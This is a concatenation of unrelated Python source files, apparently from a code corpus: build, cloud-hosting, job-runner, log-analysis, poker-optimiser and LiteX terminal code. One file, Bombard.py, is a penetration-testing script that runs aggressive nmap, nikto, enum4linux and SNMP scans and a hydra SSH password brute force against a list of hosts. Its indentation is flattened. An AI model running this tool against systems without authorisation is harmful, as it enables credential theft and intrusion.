    if MyBuild is not None:
        if not BuildError:
            MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
        MyBuild.Db.Close()
    EdkLogger.SetLevel(EdkLogger.QUIET)
    EdkLogger.quiet("\n- %s -" % Conclusion)
    EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
    EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)

    return ReturnCode
if __name__ == '__main__':
    # Run the build and exit with its status, clamped to the POSIX-safe
    # 0-127 range; anything outside collapses to the standard failure code 1.
    ExitCode = Main()
    if not 0 <= ExitCode <= 127:
        ExitCode = 1
    sys.exit(ExitCode)
|
java.py | # -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
from xml.dom import minidom
from tempfile import mkdtemp
from shutil import rmtree
import zipfile, tempfile, stat, os.path
from conpaas.services.webservers.manager.config import CodeVersion, JavaServiceConfiguration
from conpaas.services.webservers.agent import client
from conpaas.services.webservers.misc import archive_open, archive_get_members
from conpaas.core.https.server import HttpErrorResponse, HttpJsonResponse
from . import BasicWebserversManager, ManagerException
from conpaas.core.expose import expose
from conpaas.core import git
class JavaManager(BasicWebserversManager):
    """ConPaaS manager for the Java (Tomcat) web-hosting service.

    Extends the basic webservers manager with Tomcat-specific code upload,
    HTTP proxy (re)configuration, and the HTTP endpoints exposed to the
    front-end (service info, configuration get/update).
    """

    def __init__(self, config_parser, **kwargs):
        BasicWebserversManager.__init__(self, config_parser)
        if kwargs['reset_config']:
            self._create_initial_configuration()

    def _update_code(self, config, nodes):
        """Push the currently active code version to every node in *nodes*.

        On any agent failure the manager enters S_ERROR and the remaining
        nodes are skipped.
        """
        for serviceNode in nodes:
            # Push the current code version via GIT if necessary
            if config.codeVersions[config.currentCodeVersion].type == 'git':
                _, err = git.git_push(git.DEFAULT_CODE_REPO, serviceNode.ip)
                if err:
                    self.logger.debug('git-push to %s: %s' % (serviceNode.ip, err))
            try:
                if serviceNode.isRunningBackend: ## UPLOAD TOMCAT CODE TO TOMCAT
                    client.updateTomcatCode(serviceNode.ip, 5555, config.currentCodeVersion, config.codeVersions[config.currentCodeVersion].type, os.path.join(self.code_repo, config.currentCodeVersion))
                if serviceNode.isRunningProxy or serviceNode.isRunningWeb:
                    client.updatePHPCode(serviceNode.ip, 5555, config.currentCodeVersion, config.codeVersions[config.currentCodeVersion].type, os.path.join(self.code_repo, config.currentCodeVersion))
            except client.AgentException:
                self.logger.exception('Failed to update code at node %s' % str(serviceNode))
                self._state_set(self.S_ERROR, msg='Failed to update code at node %s' % str(serviceNode))
                return

    def _start_proxy(self, config, nodes):
        """Create the HTTP proxy on each node, wired to the current web and
        Tomcat backends and to the servlet URLs of the active code version."""
        kwargs = {
            'web_list': config.getWebTuples(),
            'tomcat_list': config.getBackendTuples(),
            'tomcat_servlets': self._get_servlet_urls(config.currentCodeVersion),
        }
        for proxyNode in nodes:
            try:
                if config.currentCodeVersion != None:
                    client.createHttpProxy(proxyNode.ip, 5555,
                                           config.proxy_config.port,
                                           config.currentCodeVersion,
                                           **kwargs)
            except client.AgentException:
                self.logger.exception('Failed to start proxy at node %s' % str(proxyNode))
                self._state_set(self.S_ERROR, msg='Failed to start proxy at node %s' % str(proxyNode))
                raise

    def _update_proxy(self, config, nodes):
        """Reconfigure an already-running proxy on each node (same payload
        as _start_proxy but via the agent's update call)."""
        kwargs = {
            'web_list': config.getWebTuples(),
            'tomcat_list': config.getBackendTuples(),
            'tomcat_servlets': self._get_servlet_urls(config.currentCodeVersion),
        }
        for proxyNode in nodes:
            try:
                if config.currentCodeVersion != None:
                    client.updateHttpProxy(proxyNode.ip, 5555,
                                           config.proxy_config.port,
                                           config.currentCodeVersion,
                                           **kwargs)
            except client.AgentException:
                self.logger.exception('Failed to update proxy at node %s' % str(proxyNode))
                self._state_set(self.S_ERROR, msg='Failed to update proxy at node %s' % str(proxyNode))
                raise

    def _start_backend(self, config, nodes):
        """Start a Tomcat instance on each backend node."""
        for serviceNode in nodes:
            try:
                client.createTomcat(serviceNode.ip, 5555, config.backend_config.port)
            except client.AgentException:
                self.logger.exception('Failed to start Tomcat at node %s' % str(serviceNode))
                self._state_set(self.S_ERROR, msg='Failed to start Tomcat at node %s' % str(serviceNode))
                raise

    def _stop_backend(self, config, nodes):
        """Stop the Tomcat instance on each backend node."""
        for serviceNode in nodes:
            try: client.stopTomcat(serviceNode.ip, 5555)
            except client.AgentException:
                self.logger.exception('Failed to stop Tomcat at node %s' % str(serviceNode))
                self._state_set(self.S_ERROR, msg='Failed to stop Tomcat at node %s' % str(serviceNode))
                raise

    @expose('GET')
    def get_service_info(self, kwargs):
        """HTTP endpoint: report the manager state and service type."""
        if len(kwargs) != 0:
            return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
        return HttpJsonResponse({'state': self._state_get(), 'type': 'JAVA'})

    @expose('GET')
    def get_configuration(self, kwargs):
        """HTTP endpoint: report the currently deployed code version id."""
        if len(kwargs) != 0:
            return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
        config = self._configuration_get()
        return HttpJsonResponse({'codeVersionId': config.currentCodeVersion})

    @expose('POST')
    def update_java_configuration(self, kwargs):
        """HTTP endpoint: switch the deployed code version.

        When the service is INIT/STOPPED the change is recorded directly;
        when RUNNING it is applied asynchronously on a worker thread via
        do_update_configuration. Any other state is rejected.
        """
        if 'codeVersionId' not in kwargs:
            return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, 'at least one of "codeVersionId"').message)
        codeVersionId = kwargs.pop('codeVersionId')
        config = self._configuration_get()
        if len(kwargs) != 0:
            return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
        dstate = self._state_get()
        if dstate == self.S_INIT or dstate == self.S_STOPPED:
            if codeVersionId: config.currentCodeVersion = codeVersionId
            self._configuration_set(config)
        elif dstate == self.S_RUNNING:
            self._state_set(self.S_ADAPTING, msg='Updating configuration')
            Thread(target=self.do_update_configuration, args=[config, codeVersionId]).start()
        else:
            return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
        return HttpJsonResponse()

    def _get_servlet_urls_from_webxml(self, webxml_filename):
        """Return the servlet url-pattern strings declared in a web.xml file."""
        ret = []
        doc = minidom.parse(webxml_filename)
        mappers = doc.getElementsByTagName('servlet-mapping')
        for m in mappers:
            url = m.getElementsByTagName('url-pattern')[0].firstChild.wholeText
            ret.append(url)
        return ret

    def _get_servlet_urls(self, codeVersionId):
        """Return servlet URLs for a code version.

        A file in the code repo means an uploaded archive (web.xml extracted
        to a temp dir); a directory means a git checkout (web.xml read in
        place). Returns [] when no web.xml is found.
        """
        ret = []
        archname = os.path.join(self.code_repo, codeVersionId)
        if os.path.isfile(archname):
            # File-based code upload
            arch = archive_open(archname)
            filelist = archive_get_members(arch)
            if 'WEB-INF/web.xml' in filelist:
                tmp_dir = mkdtemp()
                arch.extract('WEB-INF/web.xml', path=tmp_dir)
                ret = self._get_servlet_urls_from_webxml(os.path.join(tmp_dir, 'WEB-INF', 'web.xml'))
                rmtree(tmp_dir, ignore_errors=True)
            return ret
        # git-based code upload
        webxml_filename = os.path.join(archname, 'WEB-INF', 'web.xml')
        if os.path.isfile(webxml_filename):
            ret = self._get_servlet_urls_from_webxml(webxml_filename)
        return ret

    def do_update_configuration(self, config, codeVersionId):
        """Worker: roll the new code version out to all nodes, refresh web
        and proxy layers, then return the service to RUNNING."""
        if codeVersionId != None:
            config.prevCodeVersion = config.currentCodeVersion
            config.currentCodeVersion = codeVersionId
            self._update_code(config, config.serviceNodes.values())
            self._update_web(config, config.getWebServiceNodes())
            self._update_proxy(config, config.getProxyServiceNodes())
        self._state_set(self.S_RUNNING)
        self._configuration_set(config)

    def _create_initial_configuration(self):
        """Create the default configuration with a placeholder welcome page
        zipped as code version 'code-default'."""
        config = JavaServiceConfiguration()
        config.backend_count = 0
        config.web_count = 0
        config.proxy_count = 1
        if not os.path.exists(self.code_repo):
            os.makedirs(self.code_repo)
        # Write the placeholder index page to a temp file before zipping it.
        fileno, path = tempfile.mkstemp()
        fd = os.fdopen(fileno, 'w')
        fd.write('''<html>
<head>
<title>Welcome to ConPaaS!</title>
</head>
<body bgcolor="white" text="black">
<center><h1>Welcome to ConPaaS!</h1></center>
</body>
</html>''')
        fd.close()
        os.chmod(path, stat.S_IRWXU | stat.S_IROTH | stat.S_IXOTH)
        # NOTE(review): when codeVersions is already populated, this early
        # return leaks the temp file created above -- consider performing
        # this check before creating the file.
        if len(config.codeVersions) > 0: return
        zfile = zipfile.ZipFile(os.path.join(self.code_repo,'code-default'), mode='w')
        zfile.write(path, 'index.html')
        zfile.close()
        os.remove(path)
        config.codeVersions['code-default'] = CodeVersion('code-default', 'code-default.war', 'zip', description='Initial version')
        config.currentCodeVersion = 'code-default'
        self._configuration_set(config)
        self._state_set(self.S_INIT)
|
__init__.py | import asyncio
import sys
import traceback
from asyncio import CancelledError, Event, Semaphore
from asyncio.events import AbstractEventLoop
from collections import defaultdict
from threading import Thread
from typing import Coroutine, Dict
from uuid import uuid4
from ...logging import UltestLogger
class JobManager:
    """Runs coroutines as cancellable jobs on a private event-loop thread.

    Jobs are registered under a caller-supplied group name so that a whole
    group can be cancelled at once; overall concurrency can be bounded by
    acquiring the exposed semaphore.
    """

    def __init__(self, logger: UltestLogger, num_threads: int = 2):
        self._logger = logger
        # group name -> {job id -> that job's cancellation event}
        self._jobs: defaultdict[str, Dict[str, Event]] = defaultdict(dict)
        # Private loop run forever on a daemon thread so scheduling a job
        # never blocks the caller.
        self._loop = asyncio.new_event_loop()
        self._thread = Thread(target=self._loop.run_forever, daemon=True)
        # NOTE(review): the explicit loop= argument to Semaphore/Event was
        # deprecated in Python 3.8 and removed in 3.10 -- confirm the
        # supported interpreter range for this plugin.
        self._sem = Semaphore(num_threads, loop=self._loop)
        self._thread.start()
        if sys.version_info < (3, 8):
            # Use the new default watcher from >= 3.8, implemented locally
            # https://bugs.python.org/issue35621
            from .watcher import ThreadedChildWatcher

            self._logger.info("Using local threaded child watcher")
            asyncio.set_child_watcher(ThreadedChildWatcher())

    @property
    def semaphore(self) -> Semaphore:
        # Semaphore bounding how many jobs may do work concurrently.
        return self._sem

    def run(self, cor: Coroutine, job_group: str):
        """Schedule *cor* on the private loop under *job_group* and return
        immediately; the job gets a fresh id and cancellation event."""
        job_id = str(uuid4())
        cancel_event = Event(loop=self._loop)
        wrapped_cor = self._handle_coroutine(
            cor, job_group=job_group, job_id=job_id, cancel_event=cancel_event
        )
        asyncio.run_coroutine_threadsafe(wrapped_cor, loop=self._loop)
        self._jobs[job_group][job_id] = cancel_event

    def stop_jobs(self, group: str):
        """Signal cancellation to every job currently registered in *group*."""
        # NOTE(review): not an f-string, so "{group}" is passed literally --
        # presumably fdebug performs deferred formatting; confirm.
        self._logger.fdebug("Stopping jobs in group {group}")
        for cancel_event in self._jobs[group].values():
            # set() must run on the loop thread; Event is not thread-safe.
            self._loop.call_soon_threadsafe(cancel_event.set)

    async def _handle_coroutine(
        self, cor: Coroutine, job_group: str, job_id: str, cancel_event: Event
    ):
        """Race *cor* against its cancel event, log any failure, and always
        deregister the job on exit."""
        try:
            self._logger.fdebug("Starting job with group {job_group}")
            run_task = asyncio.create_task(cor)
            cancel_task = asyncio.create_task(cancel_event.wait())
            try:
                done, _ = await asyncio.wait(
                    [run_task, cancel_task],
                    return_when=asyncio.FIRST_COMPLETED,
                )
            except CancelledError:
                self._logger.exception(f"Task was cancelled prematurely {run_task}")
            else:
                if run_task in done:
                    # The job finished on its own: surface any exception.
                    e = run_task.exception()
                    if e:
                        self._logger.warn(f"Exception throw in job: {e}")
                        self._logger.warn(
                            "\n".join(
                                traceback.format_exception(type(e), e, e.__traceback__)
                            )
                        )
                    self._logger.fdebug("Finished job with group {job_group}")
                else:
                    # The cancel event won the race: abort the running job.
                    run_task.cancel()
                    self._logger.fdebug("Cancelled running job with group {job_group}")
        except CancelledError:
            self._logger.exception("Job runner cancelled")
            raise
        except Exception:
            self._logger.exception("Error running job")
        finally:
            self._jobs[job_group].pop(job_id)
|
log_analysis.py | #!/usr/bin/env python
#coding:utf-8
import commands
import threading
import sys
import json
# Strip the 50 noisiest client IPs out of the access log up front, so that
# crawlers/attackers do not skew the page-view statistics below.
commands.getoutput("for i in `awk '{acc[$1]++}END{for (i in acc) {print acc[i], i}}' bitbidaccess.log|sort -nr|head -50|cut -d ' ' -f 2` ; do sed -i /$i/d bitbidaccess.log; done")
# Shell pipeline prefix counting successful (200/301/302) page hits over the
# whole log, excluding static assets, admin paths and known bots; the final
# grep -icE gets the page pattern appended by log().
patter="cat bitbidaccess.log |egrep 'HTTP/1.1\" 200|HTTP/1.1\" 301|HTTP/1.1\" 302'|grep -iEv 'author|asp|js|php|admin|shtml|slurp|211.103.255.87|HEAD|spider|bot|getTZ|roleid'|grep -icE "
# Same pipeline restricted to 'newsweb' URLs, used by log1().
subpatter="cat bitbidaccess.log |egrep 'HTTP/1.1\" 200|HTTP/1.1\" 301|HTTP/1.1\" 302'|grep -iEv 'author|asp|js|php|admin|shtml|211.103.255.87|slurp|robot|HEAD|spider|bot|getTZ|roleid'|grep -i newsweb |grep -icE "
# Accumulates {'name': ..., 'value': ...} rows for web.json.
datalist = []
def log(x, y):
    """Count whole-log hits matching pattern *x* and record them under label *y*."""
    hits = commands.getoutput(patter + '"' + str(x) + '"')
    datalist.append({'name': y, 'value': int(hits)})
def log1(x, y):
    """Count newsweb-section hits matching pattern *x*, recorded under label *y*."""
    hits = commands.getoutput(subpatter + '"' + str(x) + '"')
    datalist.append({'name': y, 'value': int(hits)})
threads = []
# Whole-log page patterns: (grep pattern, display name).
a=[('.','总计'),('/home/index.html',u'首页'),('GET / HTTP/1.1','主页'),('ggweb',u'招标公告'),('login',u'我的空间'),('aboutus',u'关于平台'),('memberinfo',u'会员须知'),('search',u'主页搜索框')]
# newsweb-section patterns counted via log1().
b=[('type.401',u'项目库' ),('type.3002',u'政策法规'),('type.3001001',u'标准文件库'),('type.3001',u'下载中心'),
   ('type.101',u'新闻资讯'),('type.501',u'曝光台'),('type.201',u'行业动态'),('type.301',u'应用软件')]
for args in a:
    threads.append(threading.Thread(target=log, args=args))
for args in b:
    threads.append(threading.Thread(target=log1, args=args))
# BUG FIX: the original started and immediately joined each thread inside a
# single loop, which ran every counter strictly one after another. Start them
# all first, then wait for all, so the grep pipelines actually overlap.
# NOTE(review): with real concurrency the order of entries in datalist (and
# hence web.json) is no longer deterministic -- confirm consumers look rows
# up by 'name' rather than by position.
for t in threads:
    t.start()
for t in threads:
    t.join()
# Emit the collected counts; trailing newline matches the old `print >> f`.
with open('web.json', 'w+') as f:
    f.write(json.dumps(datalist) + '\n')
commands.getoutput("sudo cp web.json /var/www/html/")
|
Bombard.py | #!/usr/bin/python
import argparse, time, sys, os
import subprocess, multiprocessing
class Bombard(object):
def __init__(self):
self.banner()
self.parseArgs()
self.paramStrings=['1.3.6.1.2.1.25.1.6.0', '1.3.6.1.2.1.25.4.2.1.2', '1.3.6.1.2.1.25.4.2.1.4', '1.3.6.1.2.1.25.2.3.1.4', '1.3.6.1.2.1.25.6.3.1.2', '1.3.6.1.4.1.77.1.2.25', '1.3.6.1.2.1.6.13.1.3']
self.communityList="community.txt"
self.userList='userList.txt'
self.passList='passList.txt'
self.bombardHosts()
def parseArgs(self):
parser = argparse.ArgumentParser(prog='Analyzes a group of hosts and enumerates interesting info', add_help=True)
parser.add_argument('hostfile', help='host range to scan')
args = parser.parse_args()
self.hosts=self.analyzeHostfile(args.hostfile)
def bombardHosts(self):
for h in self.hosts:
protocol=h[2]
if protocol =="http" or protocol =="https":
self.addProcess(self.webEnum,[h[0],h[1],h[2]])
elif protocol == "snmp":
self.addProcess(self.snmpEnum,[h[0],h[1],h[2]])
elif protocol == "ssh":
self.addProcess(self.sshBrute,[h[0],h[1],h[2]])
elif protocol == "smb":
self.addProcess(self.smbEnum,[h[0],h[1],h[2]])
else:
print "INFO: No module found for {}. Ignored {}:{}".format(protocol,h[0],h[1])
def addProcess(self, method, arguments):
p = multiprocessing.Process(target=method, args=(arguments,))
p.start()
def webEnum(self, args):
print "INFO: Performing nmap http script scan for {}:{}".format(args[0],args[1])
nmapSCAN = "nmap -sV -Pn -vv -p {} --script='(http* or ssl*) and not (dos or fuzzer or brute)' -oN {}_http.nmap {}".format(args[1],args[0],args[0])
subprocess.check_output(nmapSCAN, shell=True)
print "INFO: Performing nikto scan on {}:{}".format(args[0],args[1])
script="nikto -host {} -port {} -C all >> {}_nikto_{}.txt".format(args[0],args[1],args[0],args[1])
subprocess.check_output(script, shell=True)
'''
print "INFO: Performing dirb scan on {}:{}".format(args[0],args[1])
dirbList="/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt"
script="dirb {}://{}:{} {} -S -w >> {}_dirb_{}.txt".format(args[2],args[0],args[1],dirbList,args[0],args[1])
subprocess.call(script, shell=True)
'''
print "INFO: Finished http module for {}:{}".format(args[0],args[1])
def smbEnum(self, args):
print "INFO: Performing nmap smb script scan for {}:{}".format(args[0],args[1])
nmapSCAN = "nmap -sV -Pn -vv -p {} --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 -oN {}_smb.nmap {}".format(args[1],args[0],args[0])
subprocess.check_output(nmapSCAN, shell=True)
print "INFO: Performing ntbscan for {}:{}".format(args[0],args[1])
nbtSCAN = "nbtscan -r -v -h {} >> {}_smbNbt.txt".format(args[0],args[0])
subprocess.check_output(nbtSCAN, shell=True)
print "INFO: Performing enum4Linux scan for {}:{}".format(args[0],args[1])
try:
enumSCAN = "enum4linux -a -M -v {} >> {}_smbEnum.txt".format(args[0],args[0])
subprocess.check_output(enumSCAN, shell=True)
except:
print "ERROR: enum4Linux scan FAILED for {}:{}".format(args[0],args[1])
print "INFO: Finished smb module for {}:{}".format(args[0],args[1])
def snmpEnum(self, args):
print "INFO: Performing nmap snmp script scan for {}:{}".format(args[0],args[1])
nmapSCAN = "nmap -sV -Pn -vv -p {} --script=snmp* -oN {}_snmp.nmap {}".format(args[1],args[0],args[0])
subprocess.check_output(nmapSCAN, shell=True)
print "INFO: Performing OneSixtyOne snmp scan for {}:{}".format(args[0],args[1])
oneSixtyOneSCAN="onesixtyone -c {} {} >> {}_161snmp.txt".format(self.communityList, args[0],args[0])
subprocess.check_output(oneSixtyOneSCAN, shell=True)
print "INFO: Performing snmpwalk scan for {}:{}".format(args[0],args[1])
for param in self.paramStrings:
try:
snmpWalkSCAN="snmpwalk -c public -v1 {} {} >> {}_snmpwalk.txt;".format(args[0], param, args[0])
subprocess.check_output(snmpWalkSCAN, shell=True)
except:
pass
print "INFO: Performing snmpcheck scan for {}:{}".format(args[0],args[1])
try:
snmpCheckSCAN="snmpcheck -t {} >> {}_snmpcheck.txt;" % (args[0],args[0])
subprocess.check_output(snmpCheckSCAN, shell=True)
except:
pass
print "INFO: Finished snmp module for {}:{}".format(args[0],args[1])
def sshBrute(self, args):
print "INFO: Performing hydra ssh bruteforce against {}:{}".format(args[0],args[1])
hydraCmd = "hydra -u -t 4 -L {} -P {} -f -s {} -o {}_sshhydra.txt {} ssh".format(self.userList, self.passList, args[1], args[0], args[0])
try:
results = subprocess.check_output(hydraCmd, shell=True)
resultarr = results.split("\n")
for result in resultarr:
if "login:" in result:
print "[*] Valid ssh credentials found: " + result
except:
print "INFO: No valid ssh credentials found"
print "INFO: Finished ssh module for {}:{}".format(args[0],args[1])
def analyzeHostfile(self, hostfile):
try:
with open(hostfile) as f:
allHosts=[]
for line in f:
if line[0]=='#':
pass
else:
if len(line.split())==3:
# Host Port Protocol
allHosts.append(line.split())
else:
raise
return allHosts
except:
print "Invalid host file formatting!"
sys.exit()
def banner(self):
print "############################################################"
print "#### Bombard ####"
print "#### Asynchronous Host Attack ####"
print "############################################################"
if __name__ == "__main__":
    # Entry point: constructing Bombard parses argv and launches all scans.
    bombard = Bombard()
optimiser.py | from typing import List
from random import random
from dealer.main import run_game_for_n_players
from player.base_player import PokerPlayer
from player.basic_heuristic_player import high_card_player
from player.basic_heuristic_player import partial_score_player
from player.random_player import random_player
from threading import Thread
# Number of heuristic players whose (fold, call) thresholds are being tuned.
player_num = 3
# Number of purely random opponents added to each game as a baseline.
rand_player_num = 1
# Starting (fold_threshold, call_threshold) pair for the search.
base_value = (0.3, 0.6)
# Total width of the uniform jitter applied when deriving new candidates.
delta = 0.4
def main():
    """Hill-climb the (fold, call) thresholds over repeated tournaments.

    Each round jitters the best thresholds into new candidates, plays a
    batch of games, and adopts the winner's thresholds unless a random
    baseline player came out on top.
    """
    best_value = base_value
    history = []
    for _ in range(10):
        candidates = get_new_inputs(best_value)
        scores = run_some_games(candidates)
        winner = max(enumerate(scores), key=lambda pair: pair[1])[0]
        if winner >= player_num:
            print("random won")
        else:
            best_value = candidates[winner]
        history.append((candidates, scores, winner, best_value))
    for entry in history:
        print(entry)
def get_new_inputs(best_value):
    """Jitter *best_value* into player_num candidate (fold, call) pairs.

    Each threshold is perturbed by a uniform offset in [-delta/2, +delta/2]
    and clamped at zero.
    """
    fold_base, call_base = best_value
    candidates = []
    for _ in range(player_num):
        jittered_fold = max(fold_base + random() * delta - (delta / 2), 0)
        jittered_call = max(call_base + random() * delta - (delta / 2), 0)
        candidates.append((jittered_fold, jittered_call))
    return candidates
def run_some_games(inputs):
    """Play 20 games with the candidate configs; return per-seat win counts."""
    tallies = [0] * (player_num + rand_player_num)
    for _ in range(20):
        run_game(inputs, tallies)
        print(".", end="")
    print(tallies)
    return tallies
def run_game(inputs, results):
    """Run one full game on a fresh server thread, recording wins in results.

    Spawns the dealer server, one partial_score_player per (fold, call)
    pair plus rand_player_num random players, then waits for the server and
    every player thread to finish.
    """
    server = start_server()
    contenders: List[PokerPlayer] = [
        partial_score_player(False, fold, call) for (fold, call) in inputs
    ]
    contenders += [random_player(False) for _ in range(rand_player_num)]
    player_threads = []
    for seat, contender in enumerate(contenders):
        contender.coms.verbose = False
        player_threads.append(start_player(contender, results, seat))
    server.join()
    for t in player_threads:
        t.join()
def start_server():
    """Launch the dealer for all seats on a background thread and return it."""
    total_seats = player_num + rand_player_num
    server = Thread(
        target=run_game_for_n_players,
        args=(total_seats,),
        kwargs={"verbose": False},
    )
    server.start()
    return server
def start_player(p: PokerPlayer, results, i):
    """Run player p on its own thread; bump results[i] when p.play() reports a win."""
    def record_result():
        if p.play():
            results[i] += 1

    player_thread = Thread(target=record_result)
    player_thread.start()
    return player_thread
# Run the optimiser when executed as a script.
if __name__ == "__main__":
    main()
|
litex_term.py | #!/usr/bin/env python3
#
# This file is part of LiteX.
#
# Copyright (c) 2015-2020 Florent Kermarrec <florent@enjoy-digital.fr>
# Copyright (c) 2015 Sebastien Bourdeauducq <sb@m-labs.hk>
# Copyright (c) 2016 whitequark <whitequark@whitequark.org>
# SPDX-License-Identifier: BSD-2-Clause
import sys
import signal
import os
import time
import serial
import threading
import multiprocessing
import argparse
import json
import socket
# Console ------------------------------------------------------------------------------------------
if sys.platform == "win32":
import ctypes
import msvcrt
    class Console:
        """Windows console helper: raw key input plus ANSI escape translation."""

        def configure(self):
            # https://stackoverflow.com/a/36760881
            # ENABLE_VIRTUAL_TERMINAL_PROCESSING
            kernel32 = ctypes.windll.kernel32
            kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)

        def unconfigure(self):
            # Nothing to restore on Windows.
            pass

        def getkey(self):
            # Blocking single-keypress read, no echo.
            return msvcrt.getch()

        # getch doesn't return Virtual Keycodes, but rather
        # PS/2 Scan Codes. Keycodes starting with 0xE0 are
        # worth handling.
        def escape_char(self, b):
            return b == b"\xe0"

        def handle_escape(self, b):
            # Map the scan code following 0xE0 to the equivalent ANSI sequence.
            return {
                b"H" : b"\x1b[A", # Up
                b"P" : b"\x1b[B", # Down
                b"K" : b"\x1b[D", # Left
                b"M" : b"\x1b[C", # Right
                b"G" : b"\x1b[H", # Home
                b"O" : b"\x1b[F", # End
                b"R" : b"\x1b[2~", # Insert
                b"S" : b"\x1b[3~", # Delete
            }.get(b, None) # TODO: Handle ESC? Others?
else:
import termios
import pty
    class Console:
        """POSIX console helper: puts the tty into non-canonical, no-echo mode."""

        def __init__(self):
            self.fd = sys.stdin.fileno()
            # Saved so unconfigure() can restore the user's terminal exactly.
            self.default_settings = termios.tcgetattr(self.fd)

        def configure(self):
            settings = termios.tcgetattr(self.fd)
            # Disable line buffering (ICANON) and local echo (ECHO).
            settings[3] = settings[3] & ~termios.ICANON & ~termios.ECHO
            # Return from read() as soon as 1 byte is available, no timeout.
            settings[6][termios.VMIN] = 1
            settings[6][termios.VTIME] = 0
            termios.tcsetattr(self.fd, termios.TCSANOW, settings)

        def unconfigure(self):
            termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.default_settings)

        def getkey(self):
            return os.read(self.fd, 1)

        def escape_char(self, b):
            # POSIX terminals already deliver ANSI sequences; no translation needed.
            return False

        def handle_escape(self, b):
            return None
# Bridge UART -------------------------------------------------------------------------------------
from litex import RemoteClient
class BridgeUART:
    """Expose a LiteX crossover UART (reached over the CSR bridge) as a local pty."""

    def __init__(self, name="uart_xover", host="localhost", base_address=0): # FIXME: add command line arguments
        self.bus = RemoteClient(host=host, base_address=base_address)
        present = False
        # Bind every "<name>_*" CSR of the design directly onto this object
        # (e.g. uart_xover_rxtx -> self.rxtx).
        for k, v in self.bus.regs.d.items():
            if f"{name}_" in k:
                setattr(self, k.replace(f"{name}_", ""), v)
                present = True
        if not present:
            raise ValueError(f"CrossoverUART {name} not present in design.")

    def open(self):
        """Open the bus and start the two pty<->CSR forwarding processes."""
        self.bus.open()
        self.file, self.name = pty.openpty()
        self.pty2crossover_thread = multiprocessing.Process(target=self.pty2crossover)
        self.crossover2pty_thread = multiprocessing.Process(target=self.crossover2pty)
        self.pty2crossover_thread.start()
        self.crossover2pty_thread.start()

    def close(self):
        self.bus.close()
        self.pty2crossover_thread.terminate()
        self.crossover2pty_thread.terminate()

    def pty2crossover(self):
        # Forward bytes typed on the pty to the device, one at a time.
        while True:
            r = os.read(self.file, 1)
            self.rxtx.write(ord(r))

    def crossover2pty(self):
        # Forward device output to the pty: burst 16 bytes when the RX FIFO
        # reports full, drain a single byte when merely non-empty, otherwise
        # idle briefly.
        while True:
            if self.rxfull.read():
                length = 16
            elif not self.rxempty.read():
                length = 1
            else:
                time.sleep(1e-3)
                continue
            r = self.bus.read(self.rxtx.addr, length=length, burst="fixed")
            for v in r:
                os.write(self.file, bytes(chr(v).encode("utf-8")))
# JTAG UART ----------------------------------------------------------------------------------------
from litex.build.openocd import OpenOCD
class JTAGUART:
    """Bridge a JTAG UART to a local pty via an OpenOCD TCP stream."""

    def __init__(self, config="openocd_xc7_ft2232.cfg", port=20000, chain=1):
        self.config = config
        self.port = port
        self.chain = chain

    def open(self):
        """Start OpenOCD, connect to its TCP server, and start the pty pumps."""
        self.file, self.name = pty.openpty()
        self.jtag2tcp_thread = multiprocessing.Process(target=self.jtag2tcp)
        self.jtag2tcp_thread.start()
        # Give OpenOCD time to bring up its TCP server before connecting.
        time.sleep(0.5)
        self.pty2tcp_thread = multiprocessing.Process(target=self.pty2tcp)
        self.tcp2pty_thread = multiprocessing.Process(target=self.tcp2pty)
        self.tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.tcp.connect(("localhost", self.port))
        self.pty2tcp_thread.start()
        self.tcp2pty_thread.start()

    def close(self):
        self.jtag2tcp_thread.terminate()
        self.pty2tcp_thread.terminate()
        self.tcp2pty_thread.terminate()

    def jtag2tcp(self):
        # Run OpenOCD, streaming the JTAG UART to the local TCP port.
        prog = OpenOCD(self.config)
        prog.stream(self.port, self.chain)

    def pty2tcp(self):
        while True:
            r = os.read(self.file, 1)
            self.tcp.send(r)

    def tcp2pty(self):
        while True:
            r = self.tcp.recv(1)
            os.write(self.file, bytes(r))
# Intel/Altera JTAG UART via nios2-terminal
class Nios2Terminal():
    """Serial-port-like wrapper around Intel's nios2-terminal subprocess."""

    def __init__(self):
        from subprocess import Popen, PIPE
        p = Popen("nios2-terminal", stdin=PIPE, stdout=PIPE)
        self.p = p

    def read(self):
        return self.p.stdout.read(1)

    def in_waiting(self):
        # unfortunately p.stdout does not provide
        # information about awaiting input
        # NOTE(review): LiteXTerm accesses `port.in_waiting` as a property
        # (no call); here it is a method, whose truthiness is always True —
        # confirm intended behaviour for the jtag_atlantic path.
        return False

    def write(self, data):
        if data is not None:
            self.p.stdin.write(data)
            try:
                self.p.stdin.flush()
            except BrokenPipeError:
                print("nios2-terminal has terminated, exiting...\n")
                sys.exit(1)

    def close(self):
        self.p.terminate()
# SFL ----------------------------------------------------------------------------------------------
# Serial Flash Loader (SFL) protocol constants, matching the device-side BIOS.
sfl_prompt_req = b"F7: boot from serial\n"
sfl_prompt_ack = b"\x06"
sfl_magic_req = b"sL5DdSMmkekro\n"
sfl_magic_ack = b"z6IHG7cYDID6o\n"
# Maximum payload bytes per frame / frames allowed in flight without an ACK.
sfl_payload_length = 255
sfl_outstanding = 128
# General commands
sfl_cmd_abort = b"\x00"
sfl_cmd_load = b"\x01"
sfl_cmd_jump = b"\x02"
# Replies
sfl_ack_success = b"K"
sfl_ack_crcerror = b"C"
sfl_ack_unknown = b"U"
sfl_ack_error = b"E"
class SFLFrame:
    """One Serial Flash Loader frame: a command byte plus payload, CRC-protected."""

    def __init__(self):
        self.cmd = bytes()
        self.payload = bytes()

